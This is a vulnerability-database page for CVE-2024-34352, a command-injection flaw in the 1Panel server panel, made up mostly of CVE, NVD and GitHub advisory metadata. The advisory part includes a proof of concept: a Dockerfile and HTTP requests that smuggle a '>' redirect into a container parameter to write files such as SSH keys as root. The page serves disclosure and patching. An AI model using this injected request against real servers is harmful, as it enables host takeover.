CVE-2024-34352 (GCVE-0-2024-34352)

Vulnerability from cvelistv5

Published

2024-05-09 14:38

Modified

2024-08-02 02:51

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

CWE

CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')

Summary

1Panel is an open source Linux server operation and maintenance management panel. Prior to v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `>` can be used to achieve arbitrary file writing. This vulnerability is fixed in v1.10.3-lts.

References

►

URL

Tags

	security-advisories@github.com	https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847	Exploit, Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	1Panel-dev	1Panel	Version: <= v1.10.2-lts

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "1panel",
            "vendor": "fit2cloud",
            "versions": [
              {
                "lessThan": "1.10.3-lts",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-34352",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-09T19:21:25.783196Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-22T13:03:33.875Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T02:51:10.692Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "1Panel",
          "vendor": "1Panel-dev",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= v1.10.2-lts"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "1Panel is an open source Linux server operation and maintenance management panel. Prior to  v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `\u003e` can be used to achieve arbitrary file writing. This vulnerability is fixed in  v1.10.3-lts."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-77",
              "description": "CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-09T14:38:19.241Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847"
        }
      ],
      "source": {
        "advisory": "GHSA-f8ch-w75v-c847",
        "discovery": "UNKNOWN"
      },
      "title": "Arbitrary file write vulnerability in 1Panel "
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-34352",
    "datePublished": "2024-05-09T14:38:19.241Z",
    "dateReserved": "2024-05-02T06:36:32.438Z",
    "dateUpdated": "2024-08-02T02:51:10.692Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-34352\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-05-14T15:38:43.160\",\"lastModified\":\"2025-02-07T02:44:20.557\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"1Panel is an open source Linux server operation and maintenance management panel. Prior to  v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `\u003e` can be used to achieve arbitrary file writing. This vulnerability is fixed in  v1.10.3-lts.\"},{\"lang\":\"es\",\"value\":\"1Panel es un panel de gesti\u00f3n de operaci\u00f3n y mantenimiento de servidores Linux de c\u00f3digo abierto. Antes de v1.10.3-lts, hab\u00eda muchas inyecciones de comandos en el proyecto y algunas de ellas no estaban bien filtradas, lo que provocaba escrituras de archivos arbitrarias y, en \u00faltima instancia, RCE. El s\u00edmbolo de escritura de configuraci\u00f3n espejo `\u0026gt;` se puede utilizar para lograr la escritura de archivos arbitraria. Esta vulnerabilidad se solucion\u00f3 en v1.10.3-lts.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.10.3-lts\",\"matchCriteriaId\":\"D6EB02C4-510B-4BB9-85AB-29475554C12E\"}]}]}],\"references\":[{\"url\":\"https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\", \"name\": \"https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T02:51:10.692Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-34352\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-05-09T19:21:25.783196Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*\"], \"vendor\": \"fit2cloud\", \"product\": \"1panel\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"1.10.3-lts\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-05-09T19:22:30.755Z\"}}], \"cna\": {\"title\": \"Arbitrary file write vulnerability in 1Panel \", \"source\": {\"advisory\": \"GHSA-f8ch-w75v-c847\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"1Panel-dev\", \"product\": \"1Panel\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= v1.10.2-lts\"}]}], \"references\": [{\"url\": \"https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\", \"name\": \"https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"1Panel is an open source Linux server operation and maintenance management panel. Prior to  v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `\u003e` can be used to achieve arbitrary file writing. This vulnerability is fixed in  v1.10.3-lts.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-77\", \"description\": \"CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-05-09T14:38:19.241Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-34352\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-02T02:51:10.692Z\", \"dateReserved\": \"2024-05-02T06:36:32.438Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-05-09T14:38:19.241Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-f8ch-w75v-c847

Vulnerability from github

Published

2024-05-09 15:14

Modified

2025-02-07 17:47

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Summary

1Panel arbitrary file write vulnerability

Details

Summary

There are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. We can use the following mirror configuration write symbol > to achieve arbitrary file writing

PoC

Dockerfile ``` FROM bash:latest

COPY echo.sh /usr/local/bin/echo.sh RUN chmod +x /usr/local/bin/echo.sh CMD ["echo.sh"] echo.sh

!/usr/local/bin/bash

echo "Hello, World!" ``` Build this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container Send the following packet, taking care to change the containerID to the malicious container we constructed

GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Ftmp%2F1&since=all&tail=100&follow=true HTTP/1.1 Host: xxxx:42713 Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Upgrade: websocket Origin: http://xxx:42713 Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d Sec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA== Then you can write any customized file to, for example, a ssh key, and generally the application is run with root privileges GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Froot%2F.ssh%2f1&since=all&tail=100&follow=true HTTP/1.1 Host: xxx:42713 Connection: Upgrade Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Upgrade: websocket Origin: http://xxx:42713 Sec-WebSocket-Version: 13 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d Sec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA== Or write a timed task to execute any command.

Impact

The ability to write arbitrary files on the host where the service is deployed can lead to a host takeover

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/1Panel-dev/1Panel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.3-lts"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34352"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-05-09T15:14:24Z",
    "nvd_published_at": "2024-05-14T15:38:43Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThere are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.\nWe can use the following mirror configuration write symbol `\u003e` to achieve arbitrary file writing\n\n### PoC\nDockerfile\n```\nFROM bash:latest\n\nCOPY echo.sh /usr/local/bin/echo.sh\nRUN chmod +x /usr/local/bin/echo.sh\nCMD [\"echo.sh\"]\n```\necho.sh\n```\n#!/usr/local/bin/bash\necho \"Hello, World!\"\n```\nBuild this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container\nSend the following packet, taking care to change the containerID to the malicious container we constructed\n\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Ftmp%2F1\u0026since=all\u0026tail=100\u0026follow=true HTTP/1.1\nHost: xxxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nThen you can write any customized file to, for example, a ssh key, and generally the application is run with root privileges\n```\nGET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Froot%2F.ssh%2f1\u0026since=all\u0026tail=100\u0026follow=true HTTP/1.1\nHost: xxx:42713\nConnection: Upgrade\nPragma: no-cache\nCache-Control: no-cache\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\nUpgrade: websocket\nOrigin: http://xxx:42713\nSec-WebSocket-Version: 13\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.9\nCookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d\nSec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==\n```\nOr write a timed task to execute any command.\n### Impact\nThe ability to write arbitrary files on the host where the service is deployed can lead to a host takeover",
  "id": "GHSA-f8ch-w75v-c847",
  "modified": "2025-02-07T17:47:10Z",
  "published": "2024-05-09T15:14:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34352"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/1Panel-dev/1Panel"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2024-2830"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "1Panel arbitrary file write vulnerability"
}

fkie_cve-2024-34352

Vulnerability from fkie_nvd

Published

2024-05-14 15:38

Modified

2025-02-07 02:44

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Summary

References

▶	URL	Tags
	security-advisories@github.com	https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847	Exploit, Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	fit2cloud	1panel	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6EB02C4-510B-4BB9-85AB-29475554C12E",
              "versionEndExcluding": "1.10.3-lts",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "1Panel is an open source Linux server operation and maintenance management panel. Prior to  v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `\u003e` can be used to achieve arbitrary file writing. This vulnerability is fixed in  v1.10.3-lts."
    },
    {
      "lang": "es",
      "value": "1Panel es un panel de gesti\u00f3n de operaci\u00f3n y mantenimiento de servidores Linux de c\u00f3digo abierto. Antes de v1.10.3-lts, hab\u00eda muchas inyecciones de comandos en el proyecto y algunas de ellas no estaban bien filtradas, lo que provocaba escrituras de archivos arbitrarias y, en \u00faltima instancia, RCE. El s\u00edmbolo de escritura de configuraci\u00f3n espejo `\u0026gt;` se puede utilizar para lograr la escritura de archivos arbitraria. Esta vulnerabilidad se solucion\u00f3 en v1.10.3-lts."
    }
  ],
  "id": "CVE-2024-34352",
  "lastModified": "2025-02-07T02:44:20.557",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-05-14T15:38:43.160",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-f8ch-w75v-c847"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2024-34352 (GCVE-0-2024-34352)

Vulnerability from cvelistv5

ghsa-f8ch-w75v-c847

Vulnerability from github

Summary

PoC

!/usr/local/bin/bash

Impact

fkie_cve-2024-34352

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature